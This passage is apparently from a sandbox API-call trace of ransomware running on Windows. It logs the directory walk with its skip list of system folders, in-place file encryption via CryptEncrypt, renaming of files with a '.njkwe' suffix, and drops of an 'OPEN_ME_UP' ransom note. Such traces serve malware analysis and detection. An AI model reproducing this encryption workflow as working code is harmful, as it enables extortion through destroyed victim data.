(lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.227] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.227] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.227] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.227] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\..") returned 88 [0076.227] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.227] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.227] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d15f260, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d15f260, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d15f260, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime", cAlternateFileName="")) returned 1 [0076.227] lstrcmpiW (lpString1="RunTime", lpString2="Windows") returned -1 [0076.227] lstrcmpiW (lpString1="RunTime", lpString2="$Recycle.bin") returned 1 [0076.227] lstrcmpiW (lpString1="RunTime", lpString2="System Volume Information") returned -1 [0076.227] lstrcmpiW (lpString1="RunTime", lpString2="Program Files") returned 1 [0076.227] lstrcmpiW (lpString1="RunTime", lpString2="Program Files (x86)") returned 1 [0076.227] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime") returned 93 [0076.228] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1 [0076.228] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1 [0076.228] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0076.228] GetProcessHeap () returned 0xbe0000 [0076.228] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0076.228] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\*") returned 95 [0076.228] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\*", lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d15f260, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d15f260, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d15f260, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a060 [0076.228] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.228] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.228] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.228] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.228] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.228] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\.") returned 95 [0076.228] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.228] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d15f260, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d15f260, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d15f260, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0076.228] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.228] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.228] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.228] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.228] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.228] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\..") returned 96 [0076.228] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.228] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.228] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53f7b887, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53f7b887, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53f7b887, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x2a5, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Power_EnergyEstimationEngine.provxml", cAlternateFileName="")) returned 1 [0076.228] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="Windows") returned -1 [0076.228] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="$Recycle.bin") returned 1 [0076.228] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="System Volume Information") returned -1 [0076.229] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="Program Files") returned -1 [0076.229] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="Program Files (x86)") returned -1 [0076.229] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml") returned 133 [0076.229] StrStrIW (lpFirst="0__Power_EnergyEstimationEngine.provxml", lpSrch=".njkwe") returned 0x0 [0076.229] lstrcmpW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.229] lstrcmpW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="taridd") returned -1 [0076.229] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\0__Power_Ener", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.229] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\0__power_energyestimationengine.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.229] GetTickCount () returned 0x115365e [0076.229] GetTickCount () returned 0x115365e [0076.229] GetTickCount () returned 0x115365e [0076.229] GetTickCount () returned 0x115365e [0076.230] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.230] GetProcessHeap () returned 0xbe0000 [0076.230] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.230] ReadFile (in: hFile=0x43c, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380edc4*=0x2a5, lpOverlapped=0x0) returned 1 [0076.231] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd5b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.231] WriteFile (in: hFile=0x43c, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x2a5, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380edc4*=0x2a5, lpOverlapped=0x0) returned 1 [0076.231] GetProcessHeap () returned 0xbe0000 [0076.231] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.231] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.231] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.232] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.232] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.232] CloseHandle (hObject=0x43c) returned 1 [0076.232] GetProcessHeap () returned 0xbe0000 [0076.232] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.232] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml_r00t_{3sXlE5}.njkwe") returned 153 [0076.232] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\0__power_energyestimationengine.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\0__power_energyestimationengine.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.232] GetProcessHeap () returned 0xbe0000 [0076.232] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.232] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53f7b887, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53f7b887, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53f7b887, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x2a5, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Power_EnergyEstimationEngine.provxml", cAlternateFileName="")) returned 0 [0076.233] FindClose (in: hFindFile=0xc1a060 | out: hFindFile=0xc1a060) returned 1 [0076.233] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 125 [0076.233] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0076.234] WriteFile (in: hFile=0x438, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380edcc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380edcc*=0x351, lpOverlapped=0x0) returned 1 [0076.234] CloseHandle (hObject=0x438) returned 1 [0076.235] GetProcessHeap () returned 0xbe0000 [0076.235] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0076.235] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53fa1af1, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53fa1af1, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53fa1af1, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x222, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0076.235] lstrcmpiW (lpString1="RunTime.xml", lpString2="Windows") returned -1 [0076.235] lstrcmpiW (lpString1="RunTime.xml", lpString2="$Recycle.bin") returned 1 [0076.235] lstrcmpiW (lpString1="RunTime.xml", lpString2="System Volume Information") returned -1 [0076.235] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files") returned 1 [0076.235] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files (x86)") returned 1 [0076.235] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime.xml") returned 97 [0076.235] StrStrIW (lpFirst="RunTime.xml", lpSrch=".njkwe") returned 0x0 [0076.235] lstrcmpW (lpString1="RunTime.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.235] lstrcmpW (lpString1="RunTime.xml", lpString2="taridd") returned -1 [0076.235] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.235] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0076.235] GetTickCount () returned 0x115366e [0076.235] GetTickCount () returned 0x115366e [0076.235] GetTickCount () returned 0x115366e [0076.235] GetTickCount () returned 0x115366e [0076.235] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0076.235] GetProcessHeap () returned 0xbe0000 [0076.235] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.235] ReadFile (in: hFile=0x438, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380f04c*=0x222, lpOverlapped=0x0) returned 1 [0076.236] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffffdde, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.236] WriteFile (in: hFile=0x438, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x222, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380f04c*=0x222, lpOverlapped=0x0) returned 1 [0076.237] GetProcessHeap () returned 0xbe0000 [0076.237] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.237] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.237] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0076.238] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0076.238] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0076.238] CloseHandle (hObject=0x438) returned 1 [0076.238] GetProcessHeap () returned 0xbe0000 [0076.238] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0076.238] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe") returned 117 [0076.238] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime.xml_r00t_{3sxle5}.njkwe")) returned 1 [0076.239] GetProcessHeap () returned 0xbe0000 [0076.239] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0076.239] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53fa1af1, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53fa1af1, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53fa1af1, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x222, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0076.239] FindClose (in: hFindFile=0xc19ea0 | out: hFindFile=0xc19ea0) returned 1 [0076.239] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 117 [0076.239] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0076.239] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0076.240] CloseHandle (hObject=0x434) returned 1 [0076.240] GetProcessHeap () returned 0xbe0000 [0076.240] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0076.240] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d15f260, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d15f260, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d15f260, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 0 [0076.240] FindClose (in: hFindFile=0xc19ca0 | out: hFindFile=0xc19ca0) returned 1 [0076.240] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 112 [0076.241] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0076.284] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0076.285] CloseHandle (hObject=0x430) returned 1 [0076.285] GetProcessHeap () returned 0xbe0000 [0076.285] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0076.285] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21b2205b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x21b6e507, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x21b6e507, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{c8a326e4-f518-4f14-b543-97a57e1a975e}", cAlternateFileName="{C8A32~1")) returned 1 [0076.285] lstrcmpiW (lpString1="{c8a326e4-f518-4f14-b543-97a57e1a975e}", lpString2="Windows") returned -1 [0076.285] lstrcmpiW (lpString1="{c8a326e4-f518-4f14-b543-97a57e1a975e}", lpString2="$Recycle.bin") returned 1 [0076.285] lstrcmpiW (lpString1="{c8a326e4-f518-4f14-b543-97a57e1a975e}", lpString2="System Volume Information") returned -1 [0076.285] lstrcmpiW (lpString1="{c8a326e4-f518-4f14-b543-97a57e1a975e}", lpString2="Program Files") returned -1 [0076.285] lstrcmpiW (lpString1="{c8a326e4-f518-4f14-b543-97a57e1a975e}", lpString2="Program Files (x86)") returned -1 [0076.285] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}") returned 80 [0076.285] lstrcmpW (lpString1="{c8a326e4-f518-4f14-b543-97a57e1a975e}", lpString2=".") returned 1 [0076.285] lstrcmpW (lpString1="{c8a326e4-f518-4f14-b543-97a57e1a975e}", lpString2="..") returned 1 [0076.285] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0076.285] GetProcessHeap () returned 0xbe0000 [0076.285] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0076.285] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\*") returned 82 [0076.285] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21b2205b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x21b6e507, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x21b6e507, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a120 [0076.288] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.288] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.288] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.288] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.288] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.288] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\.") returned 82 [0076.288] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.288] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21b2205b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x21b6e507, 